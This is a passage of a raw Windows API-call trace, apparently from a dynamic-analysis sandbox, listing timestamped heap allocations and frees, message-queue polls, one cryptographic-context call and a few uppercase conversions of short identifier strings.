(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.684] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0262.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.691] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0262.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.693] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.694] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.694] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.694] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.696] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.697] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.698] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.698] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.698] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 